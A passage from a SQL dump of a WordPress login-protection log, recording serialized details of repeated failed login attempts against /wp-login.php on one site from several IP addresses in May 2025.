s:18:\"REQUEST_TIME_FLOAT\";d:1746754508.2104299;s:12:\"REQUEST_TIME\";i:1746754508;}}','176.126.200.33',0,'2025-05-09 07:05:10','1970-01-01 00:00:00'),(95042,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"112\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"64655\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"112\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746754829.5287421;s:12:\"REQUEST_TIME\";i:1746754829;}}','35.154.1.88',1,'2025-05-09 07:10:31','2025-05-10 07:10:31'),(95043,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"119\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"64654\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"119\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746754829.5278139;s:12:\"REQUEST_TIME\";i:1746754829;}}','35.154.1.88',1,'2025-05-09 07:10:32','2025-05-10 07:10:32'),(95044,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"113\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"64663\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"113\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746754831.3695409;s:12:\"REQUEST_TIME\";i:1746754831;}}','35.154.1.88',1,'2025-05-09 07:10:33','2025-05-10 07:10:33'),(95045,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"113\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"64661\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"113\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746754831.425246;s:12:\"REQUEST_TIME\";i:1746754831;}}','35.154.1.88',1,'2025-05-09 07:10:33','2025-05-10 07:10:33'),(95046,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"115\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"64669\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"115\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746754832.3766339;s:12:\"REQUEST_TIME\";i:1746754832;}}','35.154.1.88',1,'2025-05-09 07:10:34','2025-05-10 07:10:34'),(95047,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"uk-UA,uk;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"103\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"33264\";s:11:\"REMOTE_ADDR\";s:10:\"38.57.3.35\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"103\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746755738.6882541;s:12:\"REQUEST_TIME\";i:1746755738;}}','38.57.3.35',0,'2025-05-09 07:25:40','1970-01-01 00:00:00'),(95048,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, br, deflate, zstd\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"100\";s:15:\"HTTP_USER_AGENT\";s:84:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0.1) Gecko/20100101 Firefox/125.0.1\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"52950\";s:11:\"REMOTE_ADDR\";s:13:\"54.36.209.164\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746756366.5813029;s:12:\"REQUEST_TIME\";i:1746756366;}}','54.36.209.164',0,'2025-05-09 07:36:08','1970-01-01 00:00:00'),(95049,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"tr-TR,tr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:11:\"HTTP_ACCEPT\";s:96:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"102\";s:15:\"HTTP_USER_AGENT\";s:125:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"37816\";s:11:\"REMOTE_ADDR\";s:14:\"176.126.200.33\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"102\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746757007.370126;s:12:\"REQUEST_TIME\";i:1746757007;}}','176.126.200.33',0,'2025-05-09 07:46:49','1970-01-01 00:00:00'),(95050,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"el-GR,el;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:19:\"gzip, zstd, deflate\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"98\";s:15:\"HTTP_USER_AGENT\";s:128:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"52930\";s:11:\"REMOTE_ADDR\";s:15:\"199.188.200.191\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746757652.4863729;s:12:\"REQUEST_TIME\";i:1746757652;}}','199.188.200.191',0,'2025-05-09 07:57:34','1970-01-01 00:00:00'),(95051,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ru-RU,ru;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:96:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"101\";s:15:\"HTTP_USER_AGENT\";s:125:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"51488\";s:11:\"REMOTE_ADDR\";s:12:\"51.38.119.44\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746758306.1096001;s:12:\"REQUEST_TIME\";i:1746758306;}}','51.38.119.44',0,'2025-05-09 08:08:28','1970-01-01 00:00:00'),(95052,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"tr-TR,tr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"97\";s:15:\"HTTP_USER_AGENT\";s:121:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"60876\";s:11:\"REMOTE_ADDR\";s:12:\"68.65.123.76\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"97\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746772419.525197;s:12:\"REQUEST_TIME\";i:1746772419;}}','68.65.123.76',0,'2025-05-09 12:03:41','1970-01-01 00:00:00'),(95053,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, br, 